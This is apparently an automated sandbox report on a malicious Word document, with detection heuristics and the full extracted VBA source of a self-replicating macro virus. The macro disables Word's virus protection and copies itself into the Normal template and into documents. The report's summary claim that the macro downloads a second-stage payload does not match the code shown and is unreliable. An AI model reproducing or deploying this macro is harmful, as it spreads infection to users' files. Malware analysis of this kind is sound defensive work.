MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a Microsoft Word document with a high-confidence detection for VBA macros and a critical ClamAV detection. The embedded VBA macro, named 'macros.bas', is obfuscated and attempts to execute code upon document opening. The script's intent appears to be downloading and executing a second-stage payload, though the exact mechanism is obscured by the obfuscation.
Heuristics 3
-
ClamAV: Doc.Trojan.Liar-5 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Liar-5
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7991 bytes |
SHA-256: 896a202a7b21de8f1ff801ed1049a9ef75df8ccf93f3eb78f3bf99ccbbdaa208 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub document_open() ' Dim v(150): Options.VirusProtection = (Rnd * 0) ' SetAttr NormalTemplate.FullName, vbNormal ' Set a = MacroContainer.VBProject: Set ab = a.VBComponents(1) ' Set abc = ab.CodeModule: Set s = NormalTemplate: t = Chr(39) ' Set nh = s.VBProject.VBComponents(1).CodeModule ' For y = 1 To Int(75 - (Rnd * 20)): vx = vx & Chr(255 - Int(Rnd * 100)): Next y ' vc = "Private Sub document_close()" & t & vx & vbCr ' If MacroContainer = NormalTemplate Then ' Set s = ActiveDocument: Set nh = s.VBProject.VBComponents(1).CodeModule ' vc = "Private Sub document_open()" & t & vx & vbCr ' End If: lin = abc.countoflines ' For i = 2 To lin ' jc = "": d = Int(Rnd * 3): p = InStr(abc.Lines(i, 1), t) ' If p = 0 Then GoTo e_ ' If p = 1 And lin > 100 Then ' d = 1: GoTo n_ ' End If ' l = UCase(Left(abc.Lines(i, 1), (p - 1))) ' For o = 1 To Len(l) ' f = Mid(l, o, 1) ' If Asc(f) < 90 And Asc(f) > 65 Then f = Chr(Asc(f) + Int(Rnd * 2) * 32) ' v(i) = v(i) & f ' Next o ' For j = 1 To Int(75 - (Rnd * 20)) ' jc = jc & Chr(255 - Int(Rnd * 100)) ' Next j ' v(i) = v(i) & t & jc ' If d = 2 Then v(i) = v(i) & vbCr & t & jc ' vc = vc & v(i) & vbCr ' n_: ' Next i ' e_: ' If nh.countoflines < (1 + 1) Then ' nh.addfromstring vc: s.Save ' End If ' If Day(Now()) = (25 + Int(Rnd * 6)) Then Selection.InsertAfter "l0 julie, wassup?" ' End Sub ' Rem Class97Macro.julie - dedicated to julie ;) ' Rem Another virus by jack twoflower [LineZero & Metaphase] ' ' Processing file: /opt/analyzer/scan_staging/cae8c65388474ed9be298f43513fd49f.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 3979 bytes ' Line #0: ' FuncDefn (Private Sub document_open()) ' QuoteRem 0x001C 0x0000 "" ' Line #1: ' Dim ' OptionBase ' LitDI2 0x0096 ' VarDefn v ' BoS 0x0000 ' Ld Rnd ' LitDI2 0x0000 ' Mul ' Paren ' Ld Options ' MemSt VirusProtection ' QuoteRem 0x0030 0x0000 "" ' Line #2: ' Ld NormalTemplate ' MemLd FullName ' Ld vbNormal ' ArgsCall SetAttr 0x0002 ' QuoteRem 0x002A 0x0000 "" ' Line #3: ' SetStmt ' Ld MacroContainer ' MemLd VBProject ' Set a ' BoS 0x0000 ' SetStmt ' LitDI2 0x0001 ' Ld a ' ArgsMemLd VBComponents 0x0001 ' Set ab ' QuoteRem 0x003D 0x0000 "" ' Line #4: ' SetStmt ' Ld ab ' MemLd CodeModule ' Set abc ' BoS 0x0000 ' SetStmt ' Ld NormalTemplate ' Set s ' BoS 0x0000 ' LitDI2 0x0027 ' ArgsLd Chr 0x0001 ' St t ' QuoteRem 0x003D 0x0000 "" ' Line #5: ' SetStmt ' LitDI2 0x0001 ' Ld s ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' Set nh ' QuoteRem 0x0030 0x0000 "" ' Line #6: ' StartForVariable ' Ld y ' EndForVariable ' LitDI2 0x0001 ' LitDI2 0x004B ' Ld Rnd ' LitDI2 0x0014 ' Mul ' Paren ' Sub ' FnInt ' For ' BoS 0x0000 ' Ld vx ' LitDI2 0x00FF ' Ld Rnd ' LitDI2 0x0064 ' Mul ' FnInt ' Sub ' ArgsLd Chr 0x0001 ' Concat ' St vx ' BoS 0x0000 ' StartForVariable ' Ld y ' EndForVariable ' NextVar ' QuoteRem 0x004F 0x0000 "" ' Line #7: ' LitStr 0x001C "Private Sub document_close()" ' Ld t ' Concat ' Ld vx ' Concat ' Ld vbCr ' Concat ' St vc ' QuoteRem 0x0035 0x0000 "" ' Line #8: ' Ld MacroContainer ' Ld NormalTemplate ' Eq ' IfBlock ' QuoteRem 0x0028 0x0000 "" ' Line #9: ' SetStmt ' Ld ActiveDocument ' Set s ' BoS 0x0000 ' SetStmt ' LitDI2 0x0001 ' Ld s ' MemLd VBProject ' ArgsMemLd VBComponents 0x0001 ' MemLd CodeModule ' Set nh ' QuoteRem 0x0048 0x0000 "" ' Line #10: ' LitStr 0x001B "Private Sub document_open()" ' Ld t ' Concat ' Ld vx ' Concat ' Ld vbCr ' Concat ' St vc ' QuoteRem 0x0033 0x0000 "" ' Line #11: ' EndIfBlock ' BoS 0x0000 ' Ld abc ' MemLd countoflin ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.